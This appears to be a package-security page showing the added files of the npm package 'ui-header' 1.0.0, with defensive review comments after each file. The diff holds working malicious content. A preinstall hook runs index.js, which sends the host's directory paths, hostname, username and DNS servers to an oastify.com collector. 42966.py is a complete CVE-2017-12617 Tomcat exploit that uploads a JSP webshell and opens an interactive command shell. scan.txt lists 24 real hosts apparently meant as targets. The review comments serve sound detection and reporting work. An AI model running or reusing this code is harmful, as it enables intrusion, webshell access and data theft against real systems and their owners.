ui-header 1.0.0


Potentially problematic release.


This version of ui-header might be problematic. Click here for more details.

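--- a/package/42966.py
+++ b/package/42966.py
@@ -0,0 +1,200 @@
+#!/usr/bin/python
+import requests
+import re
+import signal
+from optparse import OptionParser
+
+class bcolors:
+HEADER = '\033[95m'
+OKBLUE = '\033[94m'
+OKGREEN = '\033[92m'
+WARNING = '\033[93m'
+FAIL = '\033[91m'
+ENDC = '\033[0m'
+BOLD = '\033[1m'
+UNDERLINE = '\033[4m'
+
+
+banner="""
+
+
+_______ ________ ___ ___ __ ______ __ ___ __ __ ______
+/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
+| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
+| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
+| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
+\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
+
+
+
+[@intx0x80]
+
+"""
+
+
+def signal_handler(signal, frame):
+
+print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
+
+exit()
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+
+
+def removetags(tags):
+remove = re.compile('<.*?>')
+txt = re.sub(remove, '\n', tags)
+return txt.replace("\n\n\n","\n")
+
+
+def getContent(url,f):
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+re=requests.get(str(url)+"/"+str(f), headers=headers)
+return re.content
+
+def createPayload(url,f):
+evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
+if req.status_code==201:
+print ("File Created ..")
+
+
+def RCE(url,f):
+EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+<%@ page import="java.io.*" %>
+<%
+String cmd = request.getParameter("cmd");
+String output = "";
+if(cmd != null) {
+String s = null;
+try {
+Process p = Runtime.getRuntime().exec(cmd,null,null);
+BufferedReader sI = new BufferedReader(new
+InputStreamReader(p.getInputStream()));
+while((s = sI.readLine()) != null) { output += s+"</br>"; }
+} catch(IOException e) { e.printStackTrace(); }
+}
+%>
+<pre><%=output %></pre>"""
+
+
+
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
+
+
+
+def shell(url,f):
+
+while True:
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+cmd=input("$ ")
+payload={'cmd':cmd}
+if cmd=="q" or cmd=="Q":
+break
+
+re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
+re=str(re.content)
+t=removetags(re)
+print (t)
+
+
+
+
+
+#print bcolors.HEADER+ banner+bcolors.ENDC
+
+parse=OptionParser(
+
+
+bcolors.HEADER+"""
+
+
+_______ ________ ___ ___ __ ______ __ ___ __ __ ______
+/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
+| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
+| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
+| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
+\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
+
+
+
+
+./cve-2017-12617.py [options]
+
+options:
+
+-u ,--url [::] check target url if it's vulnerable
+-p,--pwn [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+[+]usage:
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+
+
+[@intx0x80]
+
+"""+bcolors.ENDC
+
+)
+
+
+parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
+parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
+parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
+
+(opt,args)=parse.parse_args()
+
+if opt.U==None and opt.P==None and opt.L==None:
+print(parse.usage)
+exit(0)
+
+
+
+else:
+if opt.U!=None and opt.P==None and opt.L==None:
+print (bcolors.OKGREEN+banner+bcolors.ENDC)
+url=str(opt.U)
+checker="Poc.jsp"
+print (bcolors.BOLD +"Poc Filename {}".format(checker))
+createPayload(str(url)+"/",checker)
+con=getContent(str(url)+"/",checker)
+if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
+print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
+
+else:
+print ('Not Vulnerable to CVE-2017-12617 ')
+elif opt.P!=None and opt.U!=None and opt.L==None:
+print (bcolors.OKGREEN+banner+bcolors.ENDC)
+pwn=str(opt.P)
+url=str(opt.U)
+print ("Uploading Webshell .....")
+pwn=pwn+".jsp"
+RCE(str(url)+"/",pwn)
+shell(str(url),pwn)
+elif opt.L!=None and opt.P==None and opt.U==None:
+print (bcolors.OKGREEN+banner+bcolors.ENDC)
+w=str(opt.L)
+f=open(w,"r")
+print ("Scaning hosts in {}".format(w))
+checker="Poc.jsp"
+for i in f.readlines():
+i=i.strip("\n")
+createPayload(str(i)+"/",checker)
+con=getContent(str(i)+"/",checker)
+if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")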
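Review bot: `package/42966.py` has no legitimate role in a package named ui-header: neither `index.js` nor `package.json` references it, and its own usage text describes it as a checker and JSP uploader for CVE-2017-12617. Its check mode sends an HTTP PUT for `Poc.jsp` with a trailing slash and then fetches the file looking for a fixed marker string, so the server-side footprint is a PUT to a `*.jsp/` path answered with 201 followed by a GET of the same name. The known precondition for this CVE is HTTP PUT being enabled on Tomcat, for example through the default servlet's `readonly` init-parameter set to false, so leaving that parameter at its default and running a patched release closes the path. The file's presence is best read as evidence of the publisher's intent, and the package should be reported rather than installed.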
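--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,47 @@
+//author:- whitehacker003@protonmail.com
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "u83bgevclp91jbnqeqvvklvj4aa1ysmh.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();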
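Review bot: `index.js` is an install-time beacon rather than a UI component: it serialises the package name, `__dirname`, `os.homedir()`, `os.hostname()`, the username, the DNS resolver list and the whole `package.json`, then POSTs them to `u83bgevclp91jbnqeqvvklvj4aa1ysmh.oastify.com` on port 443. The `req.on("error", ...)` handler has only a commented-out log line, so a blocked or failed request leaves nothing in the install output. Any host that installed this version should be treated as having disclosed that data. Search DNS and proxy logs for the hostname above and for `oastify.com` in general, and install untrusted packages with `npm install --ignore-scripts`.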
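--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "ui-header",
+"version": "1.0.0",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall":"node index.js"
+},
+"author": "",
+"license": "ISC"
+}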
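Review bot: The `"preinstall":"node index.js"` entry makes npm run `index.js` during `npm install`, before the package is ever imported, so merely resolving this dependency executes the code. The manifest has an empty `description` and `author` and declares no dependencies, which is consistent with a placeholder published to win a name lookup (inferred, not shown on the page). The line to drop is `"preinstall":"node index.js"`; consumers can neutralise such hooks with `--ignore-scripts` on the command line or `ignore-scripts=true` in `.npmrc`. The same manifest appears a second time as `package/package.json&`.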
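--- a/package/package.json&
+++ b/package/package.json&
@@ -0,0 +1,12 @@
+{
+"name": "ui-header",
+"version": "1.0.0",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall":"node index.js"
+},
+"author": "",
+"license": "ISC"
+}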
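--- a/package/scan.txt
+++ b/package/scan.txt
@@ -0,0 +1,24 @@
+https://open-preview-ent-api.safescore.ai
+https://open-preview-scoring-api.safescore.ai
+https://preview-ap-1.safescore.ai
+https://preview-caas-azure-ap-south-1.safescore.ai
+https://preview-caas-crowdstrike-ap-south-1.safescore.ai
+https://preview-caas-gcp-scc-ap-south-1.safescore.ai
+https://preview-caas-people-ap-south-1.safescore.ai
+https://preview-caas-qualys-ap-south-1.safescore.ai
+https://preview-caas-saas-ap-south-1.safescore.ai
+https://preview-caas-tanium-ap-south-1.safescore.ai
+https://preview-caas-tenable-ap-south-1.safescore.ai
+https://preview-caas-wiz-ap-south-1.safescore.ai
+https://preview-ent-api.safescore.ai
+https://preview-scoring-api.safescore.ai
+https://preview.safescore.ai
+https://signal-ingestor-preview-ap-south-1.safescore.ai
+https://preview-api.safeme.ai
+https://preview-migration.safeme.ai
+https://preview-scim.safeme.ai
+https://preview.safeme.ai
+https://preview.safe-x.cloud
+https://auth.safescore.io
+https://gpt.safescore.io
+https://mygpt.safescore.io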
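Review bot: `scan.txt` holds 24 HTTPS hosts across four related domains in the one-URL-per-line format that the `-l/--list` option of `42966.py` reads, so it is most plausibly a host list prepared for that script (inferred from the two files shipping together). Nothing in `index.js` or `package.json` reads this file, so it plays no part in the install-time behaviour. Owners of the listed hosts can check web server logs for PUT requests to `/Poc.jsp/` and look for an unexpected `Poc.jsp` in the web root.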